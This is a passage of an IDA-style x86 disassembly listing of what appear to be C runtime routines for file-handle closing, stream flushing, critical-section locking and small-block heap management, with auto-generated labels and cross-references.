sar eax, 5
mov eax, dword_47C640[eax*4]
and esi, 1Fh
pop ecx
lea ecx, [esi+esi*8]
and byte ptr [eax+ecx*4+4], 0
test edi, edi
jz short loc_417B37
push edi
call sub_419442
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_417B39
; ---------------------------------------------------------------------------
loc_417B37: ; CODE XREF: sub_417AB9+70�j
xor eax, eax
loc_417B39: ; CODE XREF: sub_417AB9+7C�j
pop edi
pop esi
retn
sub_417AB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417B3C proc near ; CODE XREF: sub_4147A7+20�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00417BBB SIZE 0000001C BYTES
push 0Ch
push offset stru_428FE8
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47C638
jnb short loc_417BBB
mov eax, ebx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_417BBB
push ebx
call sub_41CB8C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_417B93
push ebx
call sub_417AB9
pop ecx
mov [ebp+var_1C], eax
jmp short loc_417BA2
; ---------------------------------------------------------------------------
loc_417B93: ; CODE XREF: sub_417B3C+49�j
call sub_419430
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_417BA2: ; CODE XREF: sub_417B3C+55�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417BB3
mov eax, [ebp+var_1C]
jmp short loc_417BD1
sub_417B3C endp
; =============== S U B R O U T I N E =======================================
sub_417BB0 proc near ; DATA XREF: .rdata:stru_428FE8�o
mov ebx, [ebp+8]
sub_417BB0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417BB3 proc near ; CODE XREF: sub_417B3C+6A�p
push ebx
call sub_41CBFF
pop ecx
retn
sub_417BB3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_417B3C
loc_417BBB: ; CODE XREF: sub_417B3C+15�j
; sub_417B3C+35�j
call sub_419430
mov dword ptr [eax], 9
call sub_419439
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_417BD1: ; CODE XREF: sub_417B3C+72�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_417B3C
; =============== S U B R O U T I N E =======================================
sub_417BD7 proc near ; CODE XREF: sub_4147A7+18�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_417C00
test al, 8
jz short loc_417C00
push dword ptr [esi+8]
call sub_414844
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_417C00: ; CODE XREF: sub_417BD7+A�j
; sub_417BD7+E�j
pop esi
retn
sub_417BD7 endp
; =============== S U B R O U T I N E =======================================
sub_417C02 proc near ; CODE XREF: sub_4147A7+10�p
; sub_415FF8+38�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_417C51
test ax, 108h
jz short loc_417C51
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_417C50
push edi
push eax
push dword ptr [esi+10h]
call sub_41BF10
add esp, 0Ch
cmp eax, edi
jnz short loc_417C49
mov eax, [esi+0Ch]
test al, al
jns short loc_417C50
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_417C50
; ---------------------------------------------------------------------------
loc_417C49: ; CODE XREF: sub_417C02+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_417C50: ; CODE XREF: sub_417C02+25�j
; sub_417C02+3D�j ...
pop edi
loc_417C51: ; CODE XREF: sub_417C02+13�j
; sub_417C02+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_417C02 endp
; =============== S U B R O U T I N E =======================================
sub_417C5F proc near ; CODE XREF: sub_417C8D+67�p
; sub_417C8D+82�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_417C02
test eax, eax
pop ecx
jz short loc_417C74
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_417C74: ; CODE XREF: sub_417C5F+E�j
test byte ptr [esi+0Dh], 40h
jz short loc_417C89
push dword ptr [esi+10h]
call sub_41CD6E
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_417C89: ; CODE XREF: sub_417C5F+19�j
xor eax, eax
pop esi
retn
sub_417C5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C8D proc near ; CODE XREF: sub_417D62+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00417D3E SIZE 0000001B BYTES
push 14h
push offset stru_428FF8
call __SEH_prolog
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], edi
push 1
call sub_4180B5
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_417CAE: ; CODE XREF: sub_417C8D+99�j
mov [ebp+var_24], esi
cmp esi, dword_47D9C0
jge loc_417D3E
mov eax, dword_47C9A4
mov eax, [eax+esi*4]
cmp eax, edi
jz short loc_417D25
test byte ptr [eax+0Ch], 83h
jz short loc_417D25
push eax
push esi
call sub_417E57
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, dword_47C9A4
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_417D1D
cmp [ebp+arg_0], edx
jnz short loc_417D04
push eax
call sub_417C5F
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_417D1D
inc [ebp+var_1C]
jmp short loc_417D1D
; ---------------------------------------------------------------------------
loc_417D04: ; CODE XREF: sub_417C8D+64�j
cmp [ebp+arg_0], edi
jnz short loc_417D1D
test cl, 2
jz short loc_417D1D
push eax
call sub_417C5F
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_417D1D
or [ebp+var_20], eax
loc_417D1D: ; CODE XREF: sub_417C8D+5F�j
; sub_417C8D+70�j ...
mov [ebp+ms_exc.disabled], edi
call sub_417D2D
loc_417D25: ; CODE XREF: sub_417C8D+3A�j
; sub_417C8D+40�j
inc esi
jmp short loc_417CAE
sub_417C8D endp
; =============== S U B R O U T I N E =======================================
sub_417D28 proc near ; DATA XREF: .rdata:0042900C�o
xor edi, edi
mov esi, [ebp-24h]
sub_417D28 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417D2D proc near ; CODE XREF: sub_417C8D+93�p
mov eax, dword_47C9A4
push dword ptr [eax+esi*4]
push esi
call sub_417EA9
pop ecx
pop ecx
retn
sub_417D2D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_417C8D
loc_417D3E: ; CODE XREF: sub_417C8D+2A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417D59
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_417D53
mov eax, [ebp+var_20]
loc_417D53: ; CODE XREF: sub_417C8D+C1�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_417C8D
; =============== S U B R O U T I N E =======================================
sub_417D59 proc near ; CODE XREF: sub_417C8D+B5�p
; DATA XREF: .rdata:stru_428FF8�o
push 1
call sub_418021
pop ecx
retn
sub_417D59 endp
; =============== S U B R O U T I N E =======================================
sub_417D62 proc near ; CODE XREF: sub_417E14�p
push 1
call sub_417C8D
pop ecx
retn
sub_417D62 endp
; =============== S U B R O U T I N E =======================================
sub_417D6B proc near ; DATA XREF: .data:0042B010�o
mov eax, dword_47D9C0
test eax, eax
push esi
push 14h
pop esi
jnz short loc_417D7F
mov eax, 200h
jmp short loc_417D85
; ---------------------------------------------------------------------------
loc_417D7F: ; CODE XREF: sub_417D6B+B�j
cmp eax, esi
jge short loc_417D8A
mov eax, esi
loc_417D85: ; CODE XREF: sub_417D6B+12�j
mov dword_47D9C0, eax
loc_417D8A: ; CODE XREF: sub_417D6B+16�j
push 4
push eax
call sub_41C0B0
test eax, eax
pop ecx
pop ecx
mov dword_47C9A4, eax
jnz short loc_417DBB
push 4
push esi
mov dword_47D9C0, esi
call sub_41C0B0
test eax, eax
pop ecx
pop ecx
mov dword_47C9A4, eax
jnz short loc_417DBB
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_417DBB: ; CODE XREF: sub_417D6B+30�j
; sub_417D6B+49�j
xor edx, edx
mov ecx, offset off_42D988
jmp short loc_417DC9
; ---------------------------------------------------------------------------
loc_417DC4: ; CODE XREF: sub_417D6B+6D�j
mov eax, dword_47C9A4
loc_417DC9: ; CODE XREF: sub_417D6B+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_42DC08
jl short loc_417DC4
xor ecx, ecx
mov edx, offset dword_42D998
loc_417DE1: ; CODE XREF: sub_417D6B+A3�j
mov esi, ecx
mov eax, ecx
and eax, 1Fh
sar esi, 5
mov esi, dword_47C640[esi*4]
lea eax, [eax+eax*8]
mov eax, [esi+eax*4]
cmp eax, 0FFFFFFFFh
jz short loc_417E01
test eax, eax
jnz short loc_417E04
loc_417E01: ; CODE XREF: sub_417D6B+90�j
or dword ptr [edx], 0FFFFFFFFh
loc_417E04: ; CODE XREF: sub_417D6B+94�j
add edx, 20h
inc ecx
cmp edx, offset dword_42D9F8
jl short loc_417DE1
xor eax, eax
pop esi
retn
sub_417D6B endp
; =============== S U B R O U T I N E =======================================
sub_417E14 proc near ; DATA XREF: .data:0042B028�o
; FUNCTION CHUNK AT 0041CE2A SIZE 00000092 BYTES
call sub_417D62
cmp byte_47C1FC, 0
jz short locret_417E27
jmp loc_41CE2A
; ---------------------------------------------------------------------------
locret_417E27: ; CODE XREF: sub_417E14+C�j
retn
sub_417E14 endp
; =============== S U B R O U T I N E =======================================
sub_417E28 proc near ; CODE XREF: sub_4147F3+27�p
; sub_41499E+F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_42D988
cmp eax, ecx
jb short loc_417E4C
cmp eax, offset dword_42DBE8
ja short loc_417E4C
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_4180B5
pop ecx
retn
; ---------------------------------------------------------------------------
loc_417E4C: ; CODE XREF: sub_417E28+B�j
; sub_417E28+12�j
add eax, 20h
push eax
call ds:dword_42001C ; RtlEnterCriticalSection
retn
sub_417E28 endp
; =============== S U B R O U T I N E =======================================
sub_417E57 proc near ; CODE XREF: sub_417C8D+44�p
; sub_4194B5+66�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_417E6B
add eax, 10h
push eax
call sub_4180B5
pop ecx
retn
; ---------------------------------------------------------------------------
loc_417E6B: ; CODE XREF: sub_417E57+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_42001C ; RtlEnterCriticalSection
retn
sub_417E57 endp
; =============== S U B R O U T I N E =======================================
sub_417E7A proc near ; CODE XREF: sub_41483C+1�p
; sub_4149E0+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_42D988
cmp eax, ecx
jb short loc_417E9E
cmp eax, offset dword_42DBE8
ja short loc_417E9E
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_418021
pop ecx
retn
; ---------------------------------------------------------------------------
loc_417E9E: ; CODE XREF: sub_417E7A+B�j
; sub_417E7A+12�j
add eax, 20h
push eax
call ds:dword_420018 ; RtlLeaveCriticalSection
retn
sub_417E7A endp
; =============== S U B R O U T I N E =======================================
sub_417EA9 proc near ; CODE XREF: sub_417D2D+9�p
; sub_4194B5+7D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_417EBD
add eax, 10h
push eax
call sub_418021
pop ecx
retn
; ---------------------------------------------------------------------------
loc_417EBD: ; CODE XREF: sub_417EA9+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_420018 ; RtlLeaveCriticalSection
retn
sub_417EA9 endp
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_417F18 proc near ; CODE XREF: sub_417F32+20�p
cmp dword_47C1C4, 2
jnz short loc_417F2E
cmp dword_47C1D0, 5
jb short loc_417F2E
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_417F2E: ; CODE XREF: sub_417F18+7�j
; sub_417F18+10�j
push 3
pop eax
retn
sub_417F18 endp
; =============== S U B R O U T I N E =======================================
sub_417F32 proc near ; CODE XREF: .text:004161E2�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_420188 ; HeapCreate
test eax, eax
mov dword_47C99C, eax
jz short loc_417F7C
call sub_417F18
cmp eax, 3
mov dword_47C9A0, eax
jnz short loc_417F7F
push 3F8h
call sub_4180E6
test eax, eax
pop ecx
jnz short loc_417F7F
push dword_47C99C
call ds:dword_420184 ; HeapDestroy
loc_417F7C: ; CODE XREF: sub_417F32+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_417F7F: ; CODE XREF: sub_417F32+2D�j
; sub_417F32+3C�j
xor eax, eax
inc eax
retn
sub_417F32 endp
; =============== S U B R O U T I N E =======================================
sub_417F83 proc near ; CODE XREF: sub_416CB6�p
push esi
push edi
xor esi, esi
mov edi, offset dword_47C228
loc_417F8C: ; CODE XREF: sub_417F83+35�j
cmp dword_42DC14[esi*8], 1
jnz short loc_417FB4
lea eax, ds:42DC10h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_41CFB8
test eax, eax
pop ecx
pop ecx
jz short loc_417FC0
loc_417FB4: ; CODE XREF: sub_417F83+11�j
inc esi
cmp esi, 24h
jl short loc_417F8C
xor eax, eax
inc eax
loc_417FBD: ; CODE XREF: sub_417F83+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_417FC0: ; CODE XREF: sub_417F83+2F�j
and off_42DC10[esi*8], 0
xor eax, eax
jmp short loc_417FBD
sub_417F83 endp
; =============== S U B R O U T I N E =======================================
sub_417FCC proc near ; CODE XREF: sub_416C27�p
push ebx
mov ebx, ds:dword_420024
push esi
mov esi, offset off_42DC10
push edi
loc_417FDA: ; CODE XREF: sub_417FCC+30�j
mov edi, [esi]
test edi, edi
jz short loc_417FF3
cmp dword ptr [esi+4], 1
jz short loc_417FF3
push edi
call ebx ; RtlDeleteCriticalSection
push edi
call sub_414844
and dword ptr [esi], 0
pop ecx
loc_417FF3: ; CODE XREF: sub_417FCC+12�j
; sub_417FCC+18�j
add esi, 8
cmp esi, offset dword_42DD30
jl short loc_417FDA
mov esi, offset off_42DC10
pop edi
loc_418004: ; CODE XREF: sub_417FCC+50�j
mov eax, [esi]
test eax, eax
jz short loc_418013
cmp dword ptr [esi+4], 1
jnz short loc_418013
push eax
call ebx ; RtlDeleteCriticalSection
loc_418013: ; CODE XREF: sub_417FCC+3C�j
; sub_417FCC+42�j
add esi, 8
cmp esi, offset dword_42DD30
jl short loc_418004
pop esi
pop ebx
retn
sub_417FCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418021 proc near ; CODE XREF: sub_414897+2�p
; sub_414B52+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push off_42DC10[eax*8]
call ds:dword_420018 ; RtlLeaveCriticalSection
pop ebp
retn
sub_418021 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418036 proc near ; CODE XREF: sub_4180B5+14�p
; sub_4194B5+4F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
lea esi, ds:42DC10h[esi*8]
cmp dword ptr [esi], 0
jz short loc_41804E
xor eax, eax
inc eax
jmp short loc_4180B2
; ---------------------------------------------------------------------------
loc_41804E: ; CODE XREF: sub_418036+11�j
push edi
push 18h
call sub_414CAD
mov edi, eax
test edi, edi
pop ecx
jnz short loc_41806C
loc_41805D: ; CODE XREF: sub_418036+63�j
call sub_419430
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_4180B1
; ---------------------------------------------------------------------------
loc_41806C: ; CODE XREF: sub_418036+25�j
push 0Ah
call sub_4180B5
cmp dword ptr [esi], 0
pop ecx
jnz short loc_41809F
push 0FA0h
push edi
call sub_41CFB8
test eax, eax
pop ecx
pop ecx
jnz short loc_41809B
push edi
call sub_414844
push 0Ah
call sub_418021
pop ecx
pop ecx
jmp short loc_41805D
; ---------------------------------------------------------------------------
loc_41809B: ; CODE XREF: sub_418036+52�j
mov [esi], edi
jmp short loc_4180A6
; ---------------------------------------------------------------------------
loc_41809F: ; CODE XREF: sub_418036+41�j
push edi
call sub_414844
pop ecx
loc_4180A6: ; CODE XREF: sub_418036+67�j
push 0Ah
call sub_418021
xor eax, eax
pop ecx
inc eax
loc_4180B1: ; CODE XREF: sub_418036+34�j
pop edi
loc_4180B2: ; CODE XREF: sub_418036+16�j
pop esi
pop ebp
retn
sub_418036 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4180B5 proc near ; CODE XREF: sub_414844+1E�p
; sub_4149EA+51�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:42DC10h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_4180DB
push eax
call sub_418036
test eax, eax
pop ecx
jnz short loc_4180DB
push 11h
call sub_4160D0
pop ecx
loc_4180DB: ; CODE XREF: sub_4180B5+11�j
; sub_4180B5+1C�j
push dword ptr [esi]
call ds:dword_42001C ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_4180B5 endp
; =============== S U B R O U T I N E =======================================
sub_4180E6 proc near ; CODE XREF: sub_417F32+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_47C99C
call ds:dword_42005C ; RtlAllocateHeap
test eax, eax
mov dword_47C988, eax
jnz short loc_418103
retn
; ---------------------------------------------------------------------------
loc_418103: ; CODE XREF: sub_4180E6+1A�j
mov ecx, [esp+arg_0]
and dword_47C980, 0
and dword_47C984, 0
mov dword_47C990, eax
xor eax, eax
mov dword_47C98C, ecx
mov dword_47C994, 10h
inc eax
retn
sub_4180E6 endp
; =============== S U B R O U T I N E =======================================
sub_41812E proc near ; CODE XREF: sub_414844+29�p
; sub_4149EA+5B�p ...
arg_0 = dword ptr 4
mov eax, dword_47C984
lea ecx, [eax+eax*4]
mov eax, dword_47C988
lea ecx, [eax+ecx*4]
jmp short loc_418152
; ---------------------------------------------------------------------------
loc_418140: ; CODE XREF: sub_41812E+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_418158
add eax, 14h
loc_418152: ; CODE XREF: sub_41812E+10�j
cmp eax, ecx
jb short loc_418140
xor eax, eax
locret_418158: ; CODE XREF: sub_41812E+1F�j
retn
sub_41812E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418159 proc near ; CODE XREF: sub_414844+38�p
; sub_4149EA+B8�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41846D
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_418224
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_4181BC
push 3Fh
pop edx
loc_4181BC: ; CODE XREF: sub_418159+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_418206
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_4181E7
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_418203
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_418203
; ---------------------------------------------------------------------------
loc_4181E7: ; CODE XREF: sub_418159+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_418203
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_418203: ; CODE XREF: sub_418159+85�j
; sub_418159+8C�j ...
mov ebx, [ebp+arg_4]
loc_418206: ; CODE XREF: sub_418159+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_418224: ; CODE XREF: sub_418159+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_418232
push 3Fh
pop edx
loc_418232: ; CODE XREF: sub_418159+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_4182D0
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_418257
mov ebx, esi
loc_418257: ; CODE XREF: sub_418159+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_418269
mov edx, esi
loc_418269: ; CODE XREF: sub_418159+10C�j
cmp ebx, edx
jz short loc_4182CB
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_4182B3
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_418299
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_4182B3
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_4182B3
; ---------------------------------------------------------------------------
loc_418299: ; CODE XREF: sub_418159+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_4182B3
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_4182B3: ; CODE XREF: sub_418159+11D�j
; sub_418159+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_4182CB: ; CODE XREF: sub_418159+112�j
mov esi, [ebp+arg_4]
jmp short loc_4182D3
; ---------------------------------------------------------------------------
loc_4182D0: ; CODE XREF: sub_418159+E2�j
mov ebx, [ebp+arg_0]
loc_4182D3: ; CODE XREF: sub_418159+175�j
cmp [ebp+var_C], 0
jnz short loc_4182E1
cmp ebx, edx
jz loc_418361
loc_4182E1: ; CODE XREF: sub_418159+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_418361
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_418338
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_418327
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_418327: ; CODE XREF: sub_418159+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_418361
; ---------------------------------------------------------------------------
loc_418338: ; CODE XREF: sub_418159+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41834E
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41834E: ; CODE XREF: sub_418159+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_418361: ; CODE XREF: sub_418159+182�j
; sub_418159+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41846C
mov eax, dword_47C980
test eax, eax
jz loc_41845E
mov ecx, dword_47C998
mov esi, ds:dword_42018C
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_47C998
mov eax, dword_47C980
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_47C980
mov eax, [eax+10h]
mov ecx, dword_47C998
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_47C980
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_47C980
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_4183EF
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_47C980
loc_4183EF: ; CODE XREF: sub_418159+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41845E
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_47C980
push dword ptr [eax+10h]
push 0
push dword_47C99C
call ds:dword_420058 ; RtlFreeHeap
mov eax, dword_47C984
mov edx, dword_47C988
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_47C980
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_41D050
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_47C984
cmp eax, dword_47C980
jbe short loc_418454
sub [ebp+arg_0], 14h
loc_418454: ; CODE XREF: sub_418159+2F5�j
mov eax, dword_47C988
mov dword_47C990, eax
loc_41845E: ; CODE XREF: sub_418159+223�j
; sub_418159+29A�j
mov eax, [ebp+arg_0]
mov dword_47C980, eax
mov dword_47C998, edi
loc_41846C: ; CODE XREF: sub_418159+216�j
pop ebx
loc_41846D: ; CODE XREF: sub_418159+37�j
pop edi
pop esi
leave
retn
sub_418159 endp
; =============== S U B R O U T I N E =======================================
sub_418471 proc near ; CODE XREF: sub_41890D+150�p
mov eax, dword_47C984
mov ecx, dword_47C994
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_4184B7
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_47C988
push edi
push dword_47C99C
call ds:dword_420158 ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_4184A6
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4184A6: ; CODE XREF: sub_418471+2F�j
add dword_47C994, 10h
mov dword_47C988, eax
mov eax, dword_47C984
loc_4184B7: ; CODE XREF: sub_418471+10�j
mov ecx, dword_47C988
push esi
push 41C4h
push 8
push dword_47C99C
lea eax, [eax+eax*4]
lea esi, [ecx+eax*4]
call ds:dword_42005C ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jnz short loc_4184E2
loc_4184DE: ; CODE XREF: sub_418471+9B�j
xor eax, eax
jmp short loc_418525
; ---------------------------------------------------------------------------
loc_4184E2: ; CODE XREF: sub_418471+6B�j
push 4
push 2000h
push 100000h
push edi
call ds:dword_420190 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41850E
push dword ptr [esi+10h]
push edi
push dword_47C99C
call ds:dword_420058 ; RtlFreeHeap
jmp short loc_4184DE
; ---------------------------------------------------------------------------
loc_41850E: ; CODE XREF: sub_418471+89�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_47C984
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_418525: ; CODE XREF: sub_418471+6F�j
pop esi
pop edi
retn
sub_418471 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418528 proc near ; CODE XREF: sub_41890D+15F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
